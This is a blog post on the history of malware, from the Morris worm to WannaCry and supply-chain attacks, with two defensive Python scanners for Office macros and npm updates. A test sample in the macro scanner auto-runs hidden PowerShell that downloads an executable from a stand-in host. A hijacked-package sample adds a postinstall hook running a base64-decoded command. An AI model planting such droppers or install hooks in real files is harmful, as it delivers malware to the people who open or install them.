
Evolution of Malware in Open Source Attacks

Published Dec 29, 2021

Malicious software, or malware, has been around for almost as long as computers themselves. Over the last decade computers have become integral to daily life, driven by cheaper hardware and near-universal internet access.

With computers and internet access getting cheaper, a large share of the population now spends more than five hours a day on their devices. As the number of connected machines has grown, malware has evolved alongside them.

The last decade alone saw a more than 87% increase in malware infections. Early malware was simple and spread on floppy disks; as computer networks expanded, malicious software evolved to use the network itself, and later the internet, as its means of propagation.

Morris Worm

Although plenty of malware existed in the 1980s, the Morris worm, released in November 1988, was the first computer worm distributed via the internet and the first to draw widespread media attention.

The Morris worm exploited a buffer overflow in the fingerd service (the daemon behind the finger command), the DEBUG mode of sendmail, and weak or reused passwords combined with rsh trust relationships. Each of these gave it remote access to a machine on the network, and every compromised host was then used to attack further hosts.

Within about fifteen hours the Morris worm had infected over two thousand computers, and in total it is estimated to have hit more than 10% of all machines then connected to the internet, with damage estimates ranging from $100,000 to $10,000,000. A flaw in its own logic made it far more disruptive than intended: it re-infected hosts that were already compromised, so machines were overloaded by many copies of the worm running at once.

Macro Malware

A great deal of malware has used Microsoft Office documents to spread to large numbers of hosts. These macro viruses typically arrived as email attachments.

In 1995 the first macro virus, Concept, appeared. Macro viruses are written in the host application's macro language, which for Microsoft Office is Visual Basic for Applications (VBA). Office applications such as Word, PowerPoint, and Excel support macros, and Word and Excel run macros with reserved names (AutoOpen and Document_Open in Word, Auto_Open and Workbook_Open in Excel) automatically when a document is opened, which gives the virus its trigger without any further user action.

Because electronic documents were exchanged so widely, spreading malware through Office files took off. And because a macro virus targets an application rather than a particular machine, the same macro runs unchanged on every computer with a vulnerable version of that application, regardless of the underlying hardware or operating system version.
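As an added illustration of the trigger described above (this is not code from the original post), the following Python script scans extracted VBA source for the reserved auto-execute procedure names and for the calls a dropper needs to reach outside the document. Both macro samples are constructed for the example; a production tool that does this job properly is olevba from the oletools project.

```python
"""Heuristic scan for auto-executing VBA macros.

This is an added example, not code from the original article. It works on
VBA source text that has already been extracted from a document; both macro
samples below are constructed.
"""
import re

# Procedure names that Word and Excel run on their own when a document is
# opened or closed: the hook a macro virus needs to run without a click.
AUTO_EXEC_NAMES = {
    "autoopen", "autoexec", "autoclose", "autoexit", "autonew",
    "document_open", "document_close",
    "auto_open", "auto_close", "workbook_open", "workbook_close",
}

# Keywords rarely needed by a legitimate document macro but typical of a
# dropper: running programs, downloading files, touching the file system,
# and writing to the Normal template (the classic spreading mechanism).
SUSPICIOUS_KEYWORDS = (
    "Shell", "WScript.Shell", "CreateObject", "URLDownloadToFile",
    "Declare Function", "Declare PtrSafe Function",
    "NormalTemplate", "Environ", "Kill", "ShellExecute",
)

PROC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\s*\(",
    re.IGNORECASE | re.MULTILINE,
)


def scan_vba(source: str) -> dict:
    """Return auto-exec entry points, suspicious keywords and a verdict."""
    procs = PROC_RE.findall(source)
    auto_exec = sorted({p for p in procs if p.lower() in AUTO_EXEC_NAMES})
    suspicious = sorted(
        k for k in SUSPICIOUS_KEYWORDS
        if re.search(r"\b" + re.escape(k) + r"\b", source, re.IGNORECASE)
    )
    # Code that both runs by itself and reaches outside the document is the
    # combination that matters; either alone only merits a closer look.
    if auto_exec and suspicious:
        verdict = "high"
    elif auto_exec or suspicious:
        verdict = "medium"
    else:
        verdict = "low"
    return {"auto_exec": auto_exec, "suspicious": suspicious, "verdict": verdict}


# Constructed sample: a harmless formatting macro that only runs when called.
BENIGN_MACRO = """
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
"""

# Constructed sample in the style of a macro dropper: runs on open and hands
# a download command to the shell (example.invalid never resolves).
MALICIOUS_MACRO = r"""
Private Sub Document_Open()
    Dim cmd As String
    cmd = "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile(" & _
          "'http://example.invalid/x.exe','" & Environ("TEMP") & "\x.exe')"
    Shell cmd, vbHide
End Sub
"""

if __name__ == "__main__":
    for name, macro in (("benign", BENIGN_MACRO), ("malicious", MALICIOUS_MACRO)):
        print(name, scan_vba(macro))
```

The keyword list is deliberately short; a real scanner also looks at obfuscation (string concatenation, Chr() chains, hex-encoded strings), which is how most modern droppers hide exactly these calls.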

Attackers also relied heavily on social engineering. In May 2000 the ILOVEYOU worm, a VBScript email attachment named LOVE-LETTER-FOR-YOU.TXT.vbs that mailed itself to every address in the victim's Outlook address book, infected millions of Windows computers worldwide within hours of its release.

Attackers constantly look for new ways to find targets and spread malware over the internet. In December 2004 the phpBB worm known as Santy exploited a vulnerability in phpBB, a widely used web forum package, to spread from site to site. Santy was the first worm to use a web search engine (Google) to locate vulnerable targets; Google eventually blocked the queries it relied on.

Stuxnet


If malware development is art, then the Stuxnet worm is the Mona Lisa of computer worms.

Stuxnet's development and spread were stealthy enough that its origins are still uncertain: the earliest known samples date from 2007 to 2009, and its development is presumed to have begun around 2005 or 2006.

Stuxnet was uncovered in 2010, and the evidence indicates that it caused substantial damage to Iran's nuclear enrichment program. Neither government has officially admitted it, but Stuxnet is widely believed to have been developed jointly by the United States and Israel.

Stuxnet is reported to have ruined about one-fifth of Iran's enrichment centrifuges. The attackers took extreme care to affect only their intended targets: the worm spread across Windows machines using several Windows zero-days and infected USB drives, but its payload activated only on hosts running the Siemens Step 7 software and connected to PLCs with the specific configuration used in the Natanz centrifuge cascades. There it modified the PLC code to vary the centrifuges' rotation speed while reporting normal readings back to the operators. The whole operation was a marksman's hit job on a narrowly defined target.

Zeus Banking Trojan

Zeus, first identified in 2007, was a banking trojan used by criminals in Eastern Europe to infect computers around the world; in October 2010 the FBI announced arrests and charges against dozens of people who had used it to loot victims' accounts. Antivirus software frequently failed to detect Zeus because of its stealth techniques, including constant repacking of its binary to defeat signature-based detection.

That stealth made Zeus one of the largest botnets on the internet, with an estimated 3.6 million infected computers in the United States alone. The motive behind the attacks was theft of victims' banking credentials.

Once installed, Zeus silently monitored user activity, using form grabbing and browser "web injects" (code inserted into banking pages from inside the browser, so it runs before TLS encryption and after the real page has loaded) to capture account numbers, passwords, and one-time codes. The stolen details were used to hijack victims' accounts and make fraudulent overseas wire transfers, typically routed through money mules.

WannaCry Ransomware


The ransomware that shook the world was WannaCry. In May 2017 it hit computers worldwide running Microsoft Windows, encrypted users' files, and demanded a ransom in Bitcoin in exchange for the decryption key.

The exploit it used, EternalBlue, targeted a flaw in Microsoft's SMBv1 implementation and had been developed by the NSA; a group calling itself The Shadow Brokers leaked it in April 2017. Microsoft had already patched the vulnerability in March 2017 (MS17-010), but less than a month after the leak the WannaCry authors wrapped the exploit in a self-propagating worm, and unpatched machines fell by the thousands. A researcher's discovery of a "kill switch" domain in the code slowed the outbreak within a day.

More than 200,000 computers in about 150 countries were infected, with financial damage estimated in the billions of dollars. The attack was attributed to North Korea.

Supply Chain Attacks

Supply chain attacks are possible in any industry. Instead of attacking the finished product directly, the attackers compromise a trusted supplier or the build and distribution process, so that the malware or spying component is delivered inside the legitimate product and arrives through a channel the victim already trusts.

NotPetya is one example. In June 2017 the update server of M.E.Doc, accounting software used by most businesses in Ukraine, was compromised, and a legitimate-looking update carried NotPetya to the software's customers. From there it spread laterally with the same EternalBlue exploit and with stolen credentials, causing billions of dollars in losses that reached well beyond Ukraine.

Supply chain attacks are among the hardest to detect and defend against, because the malicious code arrives from a source the victim trusts and is often signed. Antivirus typically scans only after the malicious package has already been built into the product, which does little to prevent the compromise. Tools such as WhiteSource Diffend (free at the time of writing) attack the problem earlier, by reviewing the changes between versions of a dependency before they are installed.

Diffend blocks the installation of known-malicious packages and flags suspicious changes in updates to packages already in use. It does this without interrupting the developers' workflow, and because it runs at install time it catches infections at the earliest stage of the development cycle.

At present Diffend covers Ruby (RubyGems) and JavaScript (npm) packages, and reports its results through a web interface and Slack notifications.
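To make the idea of version-diff review concrete, here is an added Python example (my own illustration, not Diffend's code and not from the original post) that compares two versions of an npm-style package and reports the changes that most often mark a hijacked release: a new install hook, a new dependency, risky code in changed files, and deleted files. The package versions are in-memory dicts mapping file path to content, and all three versions are constructed for the example.

```python
"""Diff-based review of a package update before it is installed.

Added example, not Diffend's own code and not from the original article: it
illustrates the kind of check a supply-chain scanner performs on the changes
between two versions of a dependency. Package versions are in-memory dicts
mapping file path to content; the three versions below are constructed.
"""
import json
import re

# npm runs these scripts during installation, with the installing user's
# privileges, on every machine that pulls the package. A hook that appears
# in a patch release is the single strongest signal of a hijacked package.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                   "preuninstall", "postuninstall")

# Source-level indicators, applied only to files that are new or changed.
SOURCE_INDICATORS = (
    ("spawns a process", re.compile(r"\b(?:child_process|execSync|spawnSync|exec)\b")),
    ("dynamic code evaluation", re.compile(r"\b(?:eval|new Function)\s*\(")),
    ("base64-decoded payload", re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]")),
    ("reads environment variables", re.compile(r"\bprocess\.env\b")),
    ("outbound network call", re.compile(r"\b(?:https?\.request|fetch|net\.connect)\s*\(")),
)


def review_update(old: dict, new: dict) -> list:
    """Return human-readable findings for the change from old to new."""
    findings = []
    old_manifest = json.loads(old.get("package.json", "{}"))
    new_manifest = json.loads(new.get("package.json", "{}"))

    old_scripts = old_manifest.get("scripts", {})
    new_scripts = new_manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        if hook in new_scripts and new_scripts[hook] != old_scripts.get(hook):
            findings.append(
                f"package.json: {hook} script added or changed: {new_scripts[hook]!r}")

    # New dependencies widen the trust boundary to yet another maintainer.
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        added = set(new_manifest.get(section, {})) - set(old_manifest.get(section, {}))
        for dep in sorted(added):
            findings.append(f"package.json: new {section} entry {dep}")

    # Unchanged files were already reviewed with the previous version.
    for path in sorted(new):
        if path == "package.json" or new[path] == old.get(path):
            continue
        for description, pattern in SOURCE_INDICATORS:
            if pattern.search(new[path]):
                findings.append(f"{path}: {description}")

    # Deleted files matter too: removed tests or integrity checks hide changes.
    for path in sorted(set(old) - set(new)):
        findings.append(f"{path}: removed")
    return findings


def manifest(version, scripts=None, dependencies=None):
    """Build a minimal package.json (constructed sample data)."""
    data = {"name": "padder", "version": version, "main": "index.js",
            "scripts": {"test": "node test.js", **(scripts or {})}}
    if dependencies:
        data["dependencies"] = dependencies
    return json.dumps(data)


OLD_VERSION = {
    "package.json": manifest("1.0.0"),
    "index.js": "module.exports = (s, n) => s.padStart(n);\n",
    "test.js": "require('assert').strictEqual(require('./index.js')('a', 3), '  a');\n",
}

# A legitimate bug-fix release: only index.js changes.
PATCH_VERSION = {
    **OLD_VERSION,
    "package.json": manifest("1.0.1"),
    "index.js": "module.exports = (s, n) => String(s ?? '').padStart(n);\n",
}

# A hijacked release: an install hook, a new dependency, an obfuscated
# command run with the user's environment, and the test file deleted.
# The base64 string is constructed and decodes to 'echo pwned'.
HIJACKED_VERSION = {
    "package.json": manifest("1.0.2", {"postinstall": "node setup.js"},
                             {"request": "^2.88.0"}),
    "index.js": OLD_VERSION["index.js"],
    "setup.js": (
        "const { execSync } = require('child_process');\n"
        "const cmd = Buffer.from('ZWNobyBwd25lZA==', 'base64').toString();\n"
        "execSync(cmd, { env: process.env });\n"
    ),
}

if __name__ == "__main__":
    print("patch release:", review_update(OLD_VERSION, PATCH_VERSION))
    print("hijacked release:", *review_update(OLD_VERSION, HIJACKED_VERSION), sep="\n  ")
```

In practice the two inputs would be the unpacked registry tarballs of the installed and the candidate version, reviewed before `npm install` runs anything; note that `npm install --ignore-scripts` neutralises the install-hook vector entirely, at the cost of breaking packages that legitimately build native code at install time.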

Conclusion

Attackers keep upgrading their techniques and attack vectors, but so do defenders. Keeping a vigilant eye on cybercrime trends and keeping your defenses up to date, from patching and malware detection to reviewing the dependencies you pull in, makes modern malware something you can fight.

Cover Photo by Erik Mclean on Unsplash

Written by Josh Robins